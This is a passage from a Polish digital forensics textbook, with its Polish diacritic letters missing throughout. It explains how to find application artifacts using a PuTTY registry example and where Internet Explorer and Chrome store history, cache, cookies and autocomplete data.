Bardzo to uatwia maszyna wirtualna z moliwoci wykonywania zrzutw.
Pozyskanie aplikacji jeli nie masz jeszcze kopii programu, ktry chcesz zbada, musisz
j zdoby. Gdy jest to darmowa aplikacja, wystarczy pobra j z internetu. Jeli jednak
jest to oprogramowanie komercyjne, konieczne moe si okaza wykupienie licencji,
cho czsto producenci udostpniaj darmowe wersje prbne lub demonstracyjne
swoich programw.
Konfiguracja oprzyrzdowania oprzyrzdowanie to programy narzdziowe
do monitorowania tego, jak dziaa aplikacja, i identyfikowania potencjalnie przydatnych
artefaktw. W kadym systemie operacyjnym dostpne s inne przyrzdy. Najczciej
pracujemy w systemach Microsoft Windows, a najlepszym pakietem narzdzi dla nich jest
Monitor procesw firmy Microsoft. W systemach Apple OS X istnieje polecenie dtruss,
a w Linuksach (i innych odmianach Uniksa) jest polecenie strace; oba wywietlaj
wszystkie wywoania systemowe wykonywane przez proces.
Instalacja instalacj aplikacji naley przeprowadzi przy wczonym oprzyrzdowaniu,
poniewa w ten sposb mona wykry pewne artefakty pozwalajce np. ustali, czy aplikacja
jest lub kiedykolwiek bya zainstalowana w badanym systemie. Po zakoczeniu instalacji
mona wyczy oprzyrzdowanie i zapisa wyniki.
Uruchomienie aplikacji naley sprbowa uruchomi aplikacj w taki sam sposb,
w jaki jest uywana w rodowisku, ktrego dotyczy ledztwo. Wprowad takie same
ustawienia konfiguracyjne i uruchom te funkcje, ktre trzeba. W ten sposb zwikszasz
szanse na wykrycie potrzebnych ladw.
Przegld danych pozyskanych za pomoc oprzyrzdowania po zakoczeniu
wykonywania wycz oprzyrzdowanie i przejrzyj wyniki. Dane zwracane przez programy
monitorujce zazwyczaj zawieraj opisy tysicy zdarze. Musisz poszuka wrd nich
interesujcych Ci jednostek, np. przypadkw utworzenia albo modyfikacji pliku.
Dostosuj ustawienia oprzyrzdowania i jeli trzeba, ponownie wykonaj testy czasami
konieczne jest poprawienie ustawie tak, aby monitor obserwowa tylko te cieki, na kocu
ktrych znajduj si pliki wykonywalne aplikacji. Jeeli np. kto uywa Monitora procesw
firmy Microsoft, moe doda filtry ograniczajce zakres monitorowania plikw. Moe by
konieczne uruchomienie aplikacji wiele razy i udoskonalenie filtrw tak, aby zbieray dane
w formie atwej do analizy.
Ostrzeenie Jeli uyjesz innej wersji aplikacji i systemu operacyjnego ni s w rodowisku bdcym
przedmiotem analizy, moesz przeoczy cenne artefakty albo wda si w poszukiwania ladw,
ktre nie maj zwizku z Twoj sytuacj. Jak ju wiesz, kada wersja programu moe pozostawia
w systemie inne artefakty. W zwizku z tym koniecznie trzeba prowadzi badania na wersji
aplikacji jak najbardziej zblionej do tej, ktra jest zainstalowana w rodowisku docelowym.
Ponadto take wersja systemu operacyjnego ma znaczenie i dlatego powinno si uywa
dokadnie takiej samej wersji (wcznie z zainstalowanymi poprawkami), jaka jest zainstalowana
w rodowisku, ktrego dotyczy ledztwo.
Teraz przedstawimy cay opisany proces na prostym przykadzie.

Dowiadujemy si, e haker zaatakowa system Windows, wykorzystujc aplikacj z graficznym
interfejsem uytkownika o nazwie PuTTY. Znalaze plik pobierania z wyprzedzeniem dla pliku
binarnego tej aplikacji, ale samego programu nie ma ju w systemie. PuTTY to klient SSH
i podejrzewasz, e haker za jego pomoc poczy si z kilkoma serwerami Linux. Szukasz wic
odpowiedzi na pytanie: Z jakimi serwerami czy si haker?. Zobaczmy, czy s jakie artefakty,
ktre pozwol znale t odpowied. Procedura dziaania wyglda nastpujco.
Przygotowanie maszyny wirtualnej z systemem Windows XP i Monitorem procesw.
Skopiowanie programu PuTTY do maszyny wirtualnej i ustawienie Monitora procesw
na rejestracj zdarze przy uyciu filtru nastawionego na nazw procesu putty.exe.
Dwukrotne kliknicie pliku wykonywalnego programu PuTTY i zalogowanie si
do serwera SSH we wasnym rodowisku.
Odczekanie kilku sekund i rozczenie si.
Po zakoczeniu poczenia wyczenie Monitora procesw i przejrzenie wynikw.
W cigu 16 sekund trwania naszego testu zostay zarejestrowane 463 zdarzenia. To niewielka
liczba, wic moglimy sobie pozwoli na przejrzenie ich wszystkich. W wikszoci aplikacji
najbardziej interesujce s przypadki tworzenia i modyfikacji plikw. Jednak przegld zapisu
zdarze wykaza brak jakiejkolwiek aktywnoci zwizanej z plikami. W systemie Windows drugim
wanym rdem materiau dowodowego jest rejestr. W zapisie zdarze znalelimy kilka operacji
RegCreateValue i RegSetValue. Nasz uwag przykua operacja RegSetValue dotyczca cieki
HKCU\Software\SimonTatham\PuTTY\SshHostKeys\rsa2@22:10.18.0.42. Nazwa tego klucza
sugeruje, e okrela on miejsce przechowywania przez program PuTTY klucza publicznego hosta,
z ktrym si czy. W tym przypadku warto tego klucza zawiera adres IP tego hosta (10.18.0.42).
Uwaga Gdy znajdziesz co ciekawego, takiego jak opisany klucz rejestru, nie wycigaj od razu pochopnych
wnioskw, tylko sprbuj dowiedzie si czego wicej. W ciece do omawianego klucza znajduje si
nazwisko Simon Tatham. Poniewa atwo powiza nazwisko z aktywnoci w systemie, uwaamy,
e stosowne bdzie poinformowanie, i Tatham jest po prostu twrc programu PuTTY. W takich
przypadkach bardzo pomocne s popularne wyszukiwarki internetowe.
Z tych informacji wynika, e moe uda si sporzdzi list hostw, z ktrymi czy si haker.
Trzeba tylko sprawdzi klucz rejestru HKCU\Software\SimonTatham\PuTTY\SshHostKeys na
odpowiednim koncie uytkownika w systemie bdcym przedmiotem ledztwa. Jednak musisz
wiedzie, e informacje te mog te wprowadza w bd.
Pierwszy problem moe wystpi, gdy klucz SshHostKeys bdzie zawiera kilka wartoci.
Wwczas nie da si jednoznacznie stwierdzi, kiedy kada z tych wartoci zostaa utworzona.
Wynika to z tego, e rejestr systemu Windows zapisuje znaczniki czasu modyfikacji (nie utworzenia),
oraz z tego, e znaczniki czasu w rejestrze s przypisywane do kluczy, a nie wartoci. Lista
skadajca si z piciu pozycji moga powstawa kilka tygodni, miesicy lub lat. Przez to atwo
wycign niepoprawny wniosek, e haker czy si z wszystkimi picioma adresami, podczas
gdy w rzeczywistoci korzysta tylko z jednego, ktry zosta zapisany jako ostatni. Ponadto, jeeli
PuTTY jest rutynowo wykorzystywany w badanym rodowisku, moe by trudno odrni wpisy
zwizane z dziaalnoci hakera od legalnych zdarze.
Drugi potencjalny problem dotyczy rozpoznania, czy dany klucz rejestru naley do uytkownika.
Koniecznie przyjrzyj si gazi rejestru tego uytkownika, pod ktrego podszy si haker. Jeli haker
wykorzysta konto Marlena, a Ty sprawdzasz ga uytkownika Administrator, to nie znajdziesz
klucza rejestru i moesz doj do bdnego wniosku, e haker nie czy si z adnym hostem.
Oczywicie przy interpretacji danych mona popeni jeszcze wiele innych bdw. Chodzi tylko
o to, aby uwaa na konkluzje formuowane na podstawie niepenych informacji.
Znasz ju oglne metody sprawdzania, jakie dane moe zapisywa aplikacja, wic moemy przej
do szczegowego opisu konkretnych kategorii aplikacji. Wybralimy cztery kategorie, ktre, jak
podpowiada nam dowiadczenie, stwarzaj najwiksze szanse na uzyskanie materiau dowodowego.
Opisujemy przegldarki internetowe, klienty poczty elektronicznej, komunikatory internetowe
oraz programy szyfrujce. W kadej z kategorii przedstawiamy po jednej typowej aplikacji, ktr
czsto spotykamy podczas wasnych ledztw. Za kadym razem opisujemy miejsca przechowywania
danych, formaty danych oraz narzdzia do ich analizy. Zaczynamy od przegldarek internetowych.
PRZEGLDARKI INTERNETOWE
Przegldarki internetowe nale do najpopularniejszych aplikacji komputerowych. Su do
pobierania, przetwarzania i prezentowania informacji, ktre najczciej wystpuj w formacie
HTML i rozmaitych formatach multimedialnych. Przegldarka pobiera dane HTML i multimedia,
a nastpnie tworzy z nich spjn prezentacj zwan potocznie stron internetow. Program ten
moe pobiera dane zarwno z komputera lokalnego, jak i innej maszyny zwanej serwerem, ktra
moe znajdowa si w sieci lokalnej, w pobliskim miecie, ale te i na drugim kocu wiata.
Ponadto przegldarki internetowe mog wysya dane do serwerw w ramach interaktywnej
komunikacji, np. poprzez aplikacje handlu elektronicznego, rodowiska wsppracy czy gry
komputerowe. W miar zwikszania si moliwoci przegldarek internetowych coraz wicej
tradycyjnych programw, takich jak procesory tekstu i klienty poczty elektronicznej, zamienia si
w aplikacje internetowe, czyli interaktywne sesje umiejscowione w przegldarce. Te zmiany
sprawiaj, e specjalici RI musz doskonale zna zasady dziaania przegldarek internetowych.
W procesie wysyania, odbierania, przetwarzania i prezentowania danych przegldarka

pozostawia w systemie wiele ladw. Prawie wszystkie tego typu aplikacje tworz nastpujce zasoby.
Historia gdy kto wchodzi na stron internetow, przegldarka zapisuje jej adres URL
wraz z dat i godzin wejcia. Dziki temu pniej mona atwiej wrci na dan stron.
Pami podrczna podczas gdy uytkownik przeglda strony, przegldarka zapisuje na
dysku twardym komputera kopie pobieranych z serwerw danych. Robi to, by przyspieszy
proces przegldania stron przez uniknicie koniecznoci pobierania wszystkiego za kadym
razem od nowa. Domylny rozmiar pamici podrcznej przegldarki rni si w zalenoci
od programu i moe by zmieniany przez uytkownika.
Cookies s to niewielkie porcje informacji, ktre strony mog nakaza przegldarce
zapisa na pniej. Najczciej mechanizm cookies wykorzystuje si do zapisywania
ustawie preferencji i podtrzymywania sesji. Wikszo przegldarek ma ustawienia
pozwalajce ograniczy (lub wyczy) cookies z wybranych lub wszystkich stron
internetowych.
Wszystkie te artefakty mog zawiera cenne dowody pozwalajce ustali, co dokadnie si
wydarzyo. Niewane, czy prowadzisz dochodzenie w sprawie kogo, kto pad ofiar inynierii
spoecznej, czy hakera, ktry zalogowa si w systemie i narobi w nim szkd, w artefaktach
pozostawionych przez przegldark moesz znale wiele tropw.
Artefakty najwaniejszych przegldarek internetowych mona analizowa za pomoc kilku
narzdzi. Poniej przedstawiamy zbiorcz list, aby nie wymienia ich w punktach dotyczcych
kadej przegldarki osobno. Komercyjne pakiety informatyki ledczej, wcznie z EnCase i FTK,
maj funkcje do analizy wikszoci artefaktw przegldarkowych, cho mog by trudnoci
z obsug najnowszych wersji tych aplikacji. Najlepsze komercyjne programy do analizy ladw
z przegldarek internetowych to narzdzia specjalistyczne przeznaczone do tego celu. Naszym
zdaniem dwa najlepsze z nich to Digital Detective NetAnalysis i Internet Evidence Finder firmy
Magnet Forensics.
W INTERNECIE
Digital Detective NetAnalysis www.digital-detective.co.uk/netanalysis.asp
Internet Evidence Finder www.magnetforensics.com/software/internet-evidence-finder
S to patne programy, ktre dostarczaj kompletne ekspertyzy artefaktw przegldarek.

Poza tym na ich korzy przemawia to, e s tasze od kompletnych pakietw oprogramowania
ledczego, wic moe sobie na nie pozwoli wiksza liczba organizacji. Istnieje te grupa darmowych
dobrych narzdzi. Wikszo z nich jest przeznaczona do badania ladw pozostawionych przez jedn
przegldark, wic prezentujemy je w odpowiednich punktach, dalej w tym rozdziale. S jednak
przynajmniej dwa znakomite wyjtki BrowsingHistoryViewer firmy NirSoft i RedLine firmy
Mandiant ktre wywietlaj histori przegldanych stron z przegldarek Internet Explorer,
Mozilla Firefox, Google Chrome i Safari w jednym miejscu.
W INTERNECIE
www.nirsoft.net/utils/browsing_history_view.html
W kolejnych punktach opisujemy trzy aktualnie najpopularniejsze przegldarki internetowe

Internet Explorer (IE), Google Chrome i Mozilla Firefox. Wedug portali analizujcych udzia
przegldarek w rynku, np. StatCounter, z tych trzech programw korzysta ponad 80% wszystkich
uytkownikw internetu. Z naszego dowiadczenia podczas pracy w rednich i duych rodowiskach
korporacyjnych wynika, e Internet Explorer jest zazwyczaj standardem. Dlatego zaczniemy
od tej aplikacji, a potem przejdziemy do Chrome i Firefoksa.
Internet Explorer
Przegldarka Internet Explorer (IE) to program o zamknitym kodzie rdowym firmy Microsoft.
Jest ona domylnie instalowana w systemach operacyjnych Windows, wic mona te najczciej
spotka j w duych przedsibiorstwach. Wersja 1.0 Internet Explorera zostaa wydana w 1995
roku wraz z wersj OEM systemu Windows 95. Firma Microsoft zakupia stanowic jej podstaw
technologi od firmy Spyglass twrcw przegldarki Mosaic. Powstay te wersje Internet
Explorera dla systemw Mac OS X, cho ju od dawna panuje stagnacja w tej kwestii i dlatego
w tej ksice nie zajmujemy si przegldark Internet Explorer for Mac.
Format danych i lokalizacje

Internet Explorer zapisuje dane w wielu plikach i kluczach rejestru. Najpierw przedstawiamy
miejsca przechowywania informacji wykorzystywanych przez funkcj automatycznego uzupeniania
formularzy i adresw URL, ustawie preferencji, pamici podrcznej, zakadek oraz cookies.
Nastpnie opisujemy mechanizm przechowywania historii tej przegldarki, ktry w niektrych
wersjach programu jest nieco skomplikowany.
Dane funkcji automatycznego uzupeniania, dokaczania wpisywanych adresw URL oraz
ustawie preferencji s przechowywane w rejestrze. Funkcja automatycznego uzupeniania
zapisuje dane wpisywane przez uytkownika w formularzach internetowych. Dane te trafiaj do
jednego z dwch kluczy rejestru wymienionych w poniszej tabeli. Jako e mog one zawiera
poufne informacje, np. hasa, przegldarka IE utrudnia ich odczyt. Istniej jednak narzdzia,
za pomoc ktrych mona je rozszyfrowa w niektrych wersjach aplikacji wrcimy do tego
tematu nieco pniej. Funkcja dokaczania wpisywanych adresw URL to ograniczona historia stron,
ktrych adresy uytkownik wpisa rcznie do paska adresu. Dodatkowo tworzony jest 64-bitowy
znacznik czasu Win32 FILETIME, ktry zostaje zapisany w drugim kluczu rejestru. Preferencje s
zapisywane w normalnych kluczach i wartociach rejestru, z ktrych wikszo ma deskryptywne
nazwy i wartoci, np. Privacy. Ponisza tabela zawiera zestawienie miejsc w rejestrze systemowym,
w ktrych przechowywane s dane funkcji automatycznego uzupeniania, funkcji dokaczania
wpisywanych adresw URL i ustawie preferencji.
Artefakt Miejsce wystpowania

Dane funkcji HKEY_CURRENT_USER\Software\Microsoft\Internet
automatycznego Explorer\IntelliForms\Storage1
uzupeniania formularzy HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\IntelliForms\Storage2
Dane funkcji dokaczania HKEY_CURRENT_USER\Software\Microsoft\Internet
wpisywanych adresw URL Explorer\TypedURLs
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\TypedURLsTime
Preferencje HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
Teraz przyjrzymy si miejscom przechowywania pamici podrcznej, zakadek i cookies.

Wszystkie te trzy artefakty s zapisywane jako pliki w systemie plikw. Zakadki i cookies przechowuje
si w postaci indywidualnych plikw w miejscach wymienionych w poniszej tabeli. Zakadki to zwyke
pliki skrtu systemu Windows, a cookies to zwyke pliki tekstowe. Folder Temporary Internet Files
to bufor przechowujcy wiele plikw, wic jego zoon z wielu podkatalogw struktur zarzdza
przegldarka. Buforowane pliki s niezmienionymi kopiami danych odbieranych przez IE od serwerw,
wic mona je przeglda w odpowiednich programach. Pooenie bufora, zakadek i cookies
zaley od wersji systemu Windows. Przedstawilimy domylne lokalizacje w dwch tabelach.
Pierwsza zawiera informacje dotyczce systemw Windows Vista i nowszych.
Artefakt Pooenie
Pami C:\Users\{nazwauytkownika}\AppData\Local\Microsoft\Windows\Temporary
podrczna Internet Files\
Zakadki C:\Users\{nazwauytkownika}\Favorites
Cookies C:\Users\{nazwauytkownika}\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\{nazwauytkownika}\AppData\Roaming\Microsoft\Windows\Cookies\Low
Ponisza tabela zawiera list lokalizacji tych samych zasobw w systemie Windows XP i starszych.
Artefakt Pooenie
Pami C:\Documents and Settings\{nazwauytkownika}\Local Settings\Temporary
podrczna Internet Files
Zakadki C:\Documents and Settings\{nazwauytkownika}\Favorites
Cookies C:\Documents and Settings\{nazwauytkownika}\Cookies
Zobaczmy, jak przegldarka IE przechowuje histori przegldanych stron. Do wersji 9. aplikacja

ta zapisywaa dane historyczne we wasnej bazie danych o nazwie index.dat. Dla kadego uytkownika
utworzonych jest kilka takich plikw, kady dla innego okresu. W IE 10 firma Microsoft porzucia
pliki index.dat i zacza wykorzystywa format bazy danych ESE (ang. Extensible Storage Engine).
Jeeli chcesz szczegowo pozna wewntrzn struktur tych formatw, moesz znale przydatne
dokumenty PDF w sekcji Downloads (do pobrania) poniszych stron internetowych.
W INTERNECIE
Index.dat code.google.com/p/libmsiecf
ESE code.google.com/p/libesedb
Index.dat
Jest to baza danych do przechowywania danych dotyczcych historii przegldanych stron,
wykorzystywana w przegldarce Internet Explorer w wersjach od 1. do 9. Zawarto tego pliku
moe si rni w zalenoci od typu przechowywanych informacji. Jeli dotycz one historii
przegldanych stron, plik ten zawiera otwierane adresy URL, dat ostatniego uycia, dat modyfikacji
pliku oraz dat wyganicia adresu URL. Pooenie plikw index.dat w systemie zaley od tego,
jak funkcj peni w systemie operacyjnym. Ponisza tabela zawiera zestawienie miejsc,
w ktrych najczciej mona spotka pliki index.dat.
System operacyjny Miejsca

Windows 95 98 {dysksystemowy}\Temporary Internet Files\Content.ie5\index.dat
{dysksystemowy}\Cookies\index.dat
{dysksystemowy}\History\History.ie5\index.dat
{dysksystemowy}\Windows\Cookies\index.dat
{dysksystemowy}\Windows\History\index.dat
\MSHist{cyfry}\index.dat
\History.IE5\index.dat
\History.IE5\MSHist{cyfry}\index.dat
{dysksystemowy}\Windows\Temporary Internet Files\index.dat
(dotyczy tylko IE 4)
{dysksystemowy}\Windows\Temporary Internet Files\Content.IE5\
index.dat
{dysksystemowy}\Windows\UserData\index.dat
System operacyjny Miejsca

Windows 95 98 {dysksystemowy}\Windows\Profiles\{nazwauytkownika}
\Cookies\index.dat
\History\index.dat
\History\MSHist{cyfry}\index.dat
\History\History.IE5\index.dat
\History\History.IE5\MSHist{cyfry}\index.dat
\Temporary Internet Files\index.dat (tylko IE)
\Temporary Internet Files\Content.IE5\index.dat
\UserData\index.dat
Windows XP {dysksystemowy}\Documents and Settings\{nazwauytkownika}
\Local Settings\Temporary Internet Files\Content.ie5\index.dat
\Cookies\index.dat
\Local Settings\History\history.ie5\index.dat
\Local Settings\History\history.ie5\MSHist{cyfry}\index.dat
\UserData\index.dat
Windows Vista-8 {dysksystemowy}\Users\{nazwauytkownika}
\Roaming\Microsoft\Windows\Cookies\index.dat
\Roaming\Microsoft\Windows\Cookies\Low\index.dat
\Local\Microsoft\Windows\History\History.IE5\index.dat
\Low\index.dat
\index.dat\MSHist{cyfry}\index.dat
\Low\index.dat\MSHist{cyfry}\index.dat
\Local\Microsoft\Windows\Temporary Internet Files\
Content.IE5\index.dat
\Local\Microsoft\Windows\Temporary Internet Files\Low\
Content.IE5index.dat
\Roaming\Microsoft\Internet Explorer\UserData\index.dat
\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat
ESE
Baza danych ESE zastpia pliki index.dat w przegldarce Internet Explorer 10. Od tej pory historia
przegldanych stron jest przechowywana w jednym pliku bazy danych dla danego uytkownika.
Firma Microsoft w przeszoci uywaa baz danych ESE do przechowywania danych LDAP,
Exchange i indeksu usugi Windows Search. Istniej narzdzia potrafice odczyta i zinterpretowa
te dane. Ich opis zamiecilimy nieco dalej. Tabela na nastpnej stronie zawiera zestawienie miejsc
przechowywania i nazwy plikw baz danych ESE przegldarki Internet Explorer.
System operacyjny Miejsce

Windows 7 8.1 {dysksystemowy}\Users\{nazwauytkownika}\AppData\Local\
Microsoft\Windows\WebCache
WebCacheV01.dat
WebCacheV16.dat
WebCacheV24.dat
Baza danych ESE zawiera kilka tabel wykorzystywanych zgodnie z zapotrzebowaniem. Aby znale
potrzebne tabele, naley odszuka w bazie danych tabel o nazwie Containers. Tabela ta, pokazana
poniej, zawiera list informacji o wszystkich innych tabelach znajdujcych si w bazie danych
i ewentualnie ciek do katalogu lokalnego, w ktrym przechowywane s odpowiednie dane.
Przykadowo wartoci Name wszystkich tabel dotyczcych historii zaczynaj si od cigu

MSHist. Bardziej szczegowe informacje na temat metod analizy baz danych ESE mona znale
w poniszym artykule.
W INTERNECIE
articles.forensicfocus.com/2013/12/10/forensic-analysis-of-the-ese-database-in-internetexplorer-10
Historia
W historii przegldanych stron przegldarki IE zapisywane s adresy URL odwiedzane przez
uytkownika. Rejestrowane s adresy wpisane rcznie w pasku adresu, jak rwnie adresy
kliknitych odnonikw i zakadek. Uytkownik przegldarki Internet Explorer moe ustawi
maksymalny czas przechowywania danych historycznych, okreli kasowanie historii przegldania
podczas zamykania programu oraz skasowa te dane wasnorcznie. Szerzej na temat sprawdzania
czasu przechowywania danych historycznych przegldarki piszemy w podpunkcie Preferencje.
Jak napisalimy wczeniej, sposb i miejsce przechowywania informacji zaley od wersji przegldarki
Internet Explorer. W wersjach starszych od 10. uywane s pliki index.dat. Natomiast w IE 10
histori przeniesiono do bazy danych ESE WebCache.
Pami podrczna
Aby przyspieszy swoje dziaanie, przegldarka IE zapisuje pliki w opisanych wczeniej lokalizacjach
tymczasowych. Naley jednak pamita, e uytkownik moe zmieni ciek do bufora w oknie
dialogowym Ustawienia danych witryny sieci Web. Gdy uytkownik wejdzie na jak stron wicej
ni raz, przegldarka odczyta dane zapisane w pamici podrcznej, a dopiero potem pobierze
now tre z serwera zgodnie ze zdefiniowanymi ustawieniami. W pamici podrcznej mog by
przechowywane obrazy, pliki HTML, pliki tekstowe, animacje SWF i inne rodzaje treci internetowej.
Uytkownik przegldarki IE moe definiowa ustawienia dotyczce sprawdzania przez aplikacj
dostpnoci nowej treci za pomoc poniszych opcji:
Nigdy,
Automatycznie,
Za kadym razem, gdy odwiedzam t stron,
Za kadym razem, gdy uruchamiam program Internet Explorer.
Za pomoc ustawie tych mona zdecydowa, kiedy przegldarka ma szuka nowej treci
na stronie. Ustawienie Automatycznie sprawia, e przegldarka sprawdza czstotliwo odwiedzin
na danej stronie i zakres zmian midzy wizytami, zanim poszuka nowej treci.
Uytkownik moe rcznie skasowa zawarto pamici podrcznej lub ustawi przegldark
tak, aby kasowaa j podczas zamykania. Pliki w buforze s przechowywane przez pewn liczb
dni ustawion przez uytkownika (domylnie w systemach Windows 7 z przegldark Internet
Explorer 10 liczba ta wynosi 20). Ponadto ustawienia pamici podrcznej umoliwiaj ograniczenie
przestrzeni dyskowej bufora, ktra zazwyczaj wynosi od 50 do 250 MB. Ich zmiana powoduje
usunicie plikw z folderu przechowywania tymczasowych plikw internetowych.
Cookies
Ustawienia cookies w rnych wersjach przegldarki IE umoliwiaj akceptowanie wszystkich
cookies, blokowanie wszystkich cookies lub akceptowanie ich na podstawie pewnych kryteriw,
takich jak odwiedzona strona, to, czy pochodz z pierwszej, czy drugiej rki, oraz rodzaj
przechowywanych w nich informacji. Przegldarka IE przechowuje cookies w postaci plikw
tekstowych w miejscach opisanych wczeniej. Pliki te mog zawiera dowolne dane, ktre s
ustawiane przez serwer np. dane formularzy, adresy IP uytkownika, znaczniki czasu,
informacje geolokalizacyjne itp.
Zakadki
W przegldarce Internet Explorer zakadki nosz nazw Ulubione i s zapisywane w postaci plikw
skrtw internetowych. Pliki te s przechowywane w folderze o nazwie Ulubione w katalogu
profilu uytkownika, maj rozszerzenie .url, a ich tre to zwyky tekst, ktry mona odczyta
w dowolnym edytorze tekstu. Jako e zakadki to pliki, zapisywane s dla nich znaczniki czasu
w kadym systemie plikw.
Narzdzia
Przegldarka Internet Explorer istnieje wiele lat, wic powstao ju kilka narzdzi do analizy
pozostawianych przez ni artefaktw. Oprcz oglnych komercyjnych i darmowych programw
wymienionych wczeniej, istnieje te kilka specjalistycznych darmowych narzdzi przeznaczonych
wycznie do szukania ladw przegldarki IE. Do najlepszych naszym zdaniem nale aplikacje
firmy NirSoft. Wprawdzie programy te nie maj tak bogatej funkcjonalnoci jak komercyjne
pakiety, ale te s godne uwagi.
W INTERNECIE
Cache Viewer www.nirsoft.net/utils/ie_cache_viewer.html
History Viewer dla IE 4 9 www.nirsoft.net/utils/iehv.html
Cookie Viewer dla IE 4 9 www.nirsoft.net/utils/iecookies.html
History and Cookie Viewer dla IE 10+ www.nirsoft.net/utils/ese_database_view.html
AutoComplete dla IE4 9 www.nirsoft.net/utils/pspv.html
AutoComplete dla IE10+ www.nirsoft.net/utils/internet_explorer_password.html
Czasami baza danych ESE jest oznaczona jako brudna (ang. dirty), co moe sprawia
niektrym aplikacjom kopoty. Wwczas konieczne bywa przeskanowanie pliku w celu naprawy
sytuacji. W system Windows wbudowane jest specjalne narzdzie o nazwie esentutl, za pomoc
ktrego mona prbowa naprawi baz danych ESE. Oto polecenie, jakiego naley uy:
esenutul /p <nazwapliku>
W miejsce czonu <nazwapliku> naley wpisa ciek do pliku bazy danych ESE. Nie zapomnij
najpierw wykona kopii zapasowej!
Google Chrome
Przegldarka internetowa Google Chrome to do nowy gracz w brany. Pojawia si w 2008 roku
i od tamtej pory jej popularno cay czas ronie, tak e aktualnie naley do trjki najpopularniejszych
przegldarek internetowych. Pierwsz wersj przegldarki Chrome dla systemu Windows firma
Google przedstawia pod koniec 2008 roku, a dla systemw OS X i Linux w 2010 roku. Wersje dla
systemw Android i iOS powstay w roku 2012. Dua cz kodu tej przegldarki jest opublikowana
jako projekt open source o nazwie Chromium. Firma Google wykorzystuje ten projekt jako podstaw
swojej przegldarki i dodaje do niej wasne elementy i funkcje, takie jak odtwarzacz plikw Flash,
przegldarka plikw PDF i system automatycznej aktualizacji. Dopiero ten zmieniony produkt
dostarcza pod nazw Chrome. Do wersji 27. przegldarka Chrome bya oparta na silniku WebKit.
Natomiast od wersji 28. zmieniono go na odnog WebKit o nazwie Blink. Firma Google bardzo
czsto publikuje nowe wersje swojej przegldarki. Celem firmy jest publikowanie nowej wersji
Chrome co sze tygodni.
Formaty danych i miejsca ich przechowywania

W folderze Chrome znajduje si podfolder User Data zawierajcy podfolder Default, w ktrym
przechowywana jest wikszo danych dotyczcych aktywnoci uytkownika. Przegldarka Chrome
zapisuje ogromne iloci informacji o tym, co robi uytkownik, ale my ograniczymy si do opisu
tylko tych artefaktw, ktre mog by najbardziej przydatne specjalicie od informatyki ledczej.
W aktualnie obsugiwanych systemach operacyjnych katalog Chrome domylnie znajduje si
w profilu uytkownika. Ponisza tabela zawiera zestawienie tych miejsc w rnych wersjach
najpopularniejszych systemw operacyjnych.
System operacyjny Lokalizacja katalogu danych

Windows XP C:\Documents and Settings\{nazwauytkownika}\Local Settings\
Application Data\Google\Chrome\
Windows Vista, 7, 8 C:\Users\{nazwauytkownika}\AppData\Local\Google\Chrome\
Linux /home/{nazwauytkownika}/.config/google-chrome/
OS X /Users/{nazwauytkownika}/Library/Application Support/Google/Chrome/
W katalogu Default znajduj si pliki i inne katalogi. Ich ilo zwiksza si z kad kolejn
wersj przegldarki wzbogacon o nowe funkcje. Przegldarka Chrome wikszo danych
przechowuje w bazach danych SQLite i plikach JSON (ang. JavaScript Object Notation), przy czym
wikszo plikw nie ma rozszerzenia. Oba te typy plikw mona atwo przeglda za pomoc
rnych narzdzi zarwno dostpnych za darmo, jak i patnych. Bardziej szczegowy opis tych
programw zamiecilimy nieco dalej. W plikach tych znajdziesz wiele rnych formatw
znacznikw czasu. Przegldarka Chrome uywa uniksowego formatu milisekundowego (epoki)
i formatu WebKit. Wicej informacji na temat rnych formatw czasu wykorzystywanych
w przegldarce Chrome znajduje si na poniszej stronie internetowej:
linuxsleuthing.blogspot.com/2011/06/decoding-google-chrome-timestamps-in.html
Historia
Znajdujce si w pliku History tabele urls i visits zawieraj informacje, ktre po poczeniu stanowi
typowe dane historyczne przegldarki internetowej tzn. pozwalajce sprawdzi, jakie strony
i kiedy byy odwiedzane. Ponadto przegldarka Chrome zapisuje pewne dodatkowe informacje
w tabelach typed_count, visit_count i transition (sposb dotarcia uytkownika na dan stron).
Jako e plik History jest baz danych SQLite, dane z niego mona wydoby na wiele sposobw.
Jednym z najprostszych jest wysyanie zapyta za pomoc narzdzia wiersza polece typu sqlite3.
Przykadowo ponisze zapytanie spowodowaoby utworzenie bardzo prostego widoku historii
stron odwiedzanych przez uytkownika:
SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time,
urls.hidden, urls.favicon_id, visits.visit_time, visits.from_visit, visits.transition,
visits.is_indexed
FROM urls, visits
WHERE urls.id = visits.url
Plik Archived History to okrojona wersja pliku History, w ktrej przechowywane s informacje
o zdarzeniach starszych ni trzy miesice. Brak w nim niektrych wykorzystywanych przez
przegldark Chrome tabel pomocniczych, ale s tabele urls i visits, ktre maj tak sam struktur
i takie same kolumny jak w pliku History.
Pliki History Index to artefakty, ktre mog okaza si kopalni zota dla ledczego. Funkcja
omnibox (poczenie paska adresu i wyszukiwania) jest jedn z kluczowych funkcji przegldarki
Chrome, ktr prbuj naladowa take producenci innych przegldarek. Gdy uytkownik
zacznie co wpisywa w polu omnibox, przegldarka wywietla podpowiedzi z wielu rde,
z ktrych jednym jest historia wczeniej odwiedzanych stron. Pliki SQLite History Index zawieraj
elementy tekstowe ze stron internetowych odwiedzonych przez uytkownika, zapisane w sposb
pozwalajcy przegldarce bardzo szybko wyszukiwa w nich sowa kluczowe. Dla ledczych
oznacza to, e oprcz adresw URL odwiedzanych przez uytkownika stron, maj do dyspozycji
tre tekstow tych stron. Dla jednej strony moe istnie wiele rekordw w indeksie historii dla
rnych momentw w czasie, wic mamy nawet moliwo obejrzenia migawek zmian treci.
Pami podrczna
Jak wszystkie nowoczesne przegldarki, Chrome zapisuje w pamici podrcznej wszystkie pobrane
pliki, ktre mog by uywane wielokrotnie, aby skrci czas adowania stron i zredukowa liczb
odwoa do serwera w celu pobrania poszczeglnych elementw stron. Pami podrczna moe
zawiera cenne informacje umoliwiajce odtworzenie stron odwiedzanych przez uytkownika
w takiej formie, w jakiej uytkownik ten je oglda. Ponadto zyskujemy dostp do kodu rdowego
tych stron oraz moemy obejrze obrazy i inne wystpujce na nich pliki. Pami podrczna
przegldarki Chrome znajduje si w katalogu Data\Default\Cache i skada przynajmniej z piciu
